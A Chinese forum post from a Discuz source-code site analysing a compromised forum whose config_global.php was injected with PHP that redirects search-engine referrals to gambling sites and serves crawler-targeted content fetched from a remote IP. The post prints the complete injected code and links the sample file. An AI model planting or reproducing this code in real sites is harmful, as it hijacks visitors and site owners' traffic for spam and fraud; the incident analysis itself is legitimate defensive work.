忘记密码?

一键登录

草根吧源码论坛

Discuz论坛特定链接被劫持指向博彩网站案列分析(远端Get IP 104.202.66.5)

查看: 285|回复: 0

Discuz论坛特定链接被劫持指向博彩网站案列分析(远端Get IP 104.202.66.5)

[复制链接]

1706

主题

2177

热度

591

贡献

民审

Rank: 8Rank: 8

发表于 2016-7-6 15:23:29 | 显示全部楼层 |阅读模式 | 百度  360  谷歌 
分享到:
本帖最后由 民审-M 于 2016-7-6 15:56 编辑

         最近有核心会员站点,点击某插件下级页面都会被跳转到博彩网站,分析如下:

(点击图放大查看!)
草根吧 Discuz论坛特定链接被劫持指向博彩网站案列分析(远端Get IP 104.202.66.5) 网站 精品教程 155513zsxa6ckz5x5jjee1

      经过浏览器的分析发现,在全局环境会引入一远端判断执行,经过改会员查找,发现论坛/config/config_global.php 被人注入一段恶意代码如下:
  1. set_time_limit(20);error_reporting(0);
  2. define('u_b','/');
  3. define('s_u','http://104.202.66.5/');
  4. define('s_s','@haosou.com|360.cn|baidu|spider|360spider|so|360|sogou|sm.cn|youdao@i');
  5. define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
  6. function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
  7. if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}
复制代码


如图所示:
(点击图放大查看!)
草根吧 Discuz论坛特定链接被劫持指向博彩网站案列分析(远端Get IP 104.202.66.5) 网站 精品教程 154841ku4gn3zierg4g72i

样本:
草根吧 Discuz论坛特定链接被劫持指向博彩网站案列分析(远端Get IP 104.202.66.5) 网站 精品教程 zip config_global.zip (2.1 KB, 下载次数: 0)

帖子地址: 

本文来源于草根吧源码论坛 www.caogen8.co,欢迎大家下载。
如果您没有贡献需要充值,可以直接在线充值,点击充值
如果你需要加入本站赞助VIP会员,可以直接在线开通,点击开通
如果找不到您要的资源,请搜索一下,点击搜索
回复

举报

发表回复

您需要登录后才可以回帖 登录 | 立即注册 新浪微博登陆 用百度帐号登录 一键登录:

本版积分规则

收藏帖子 返回列表 搜索
快速回复 返回顶部 返回列表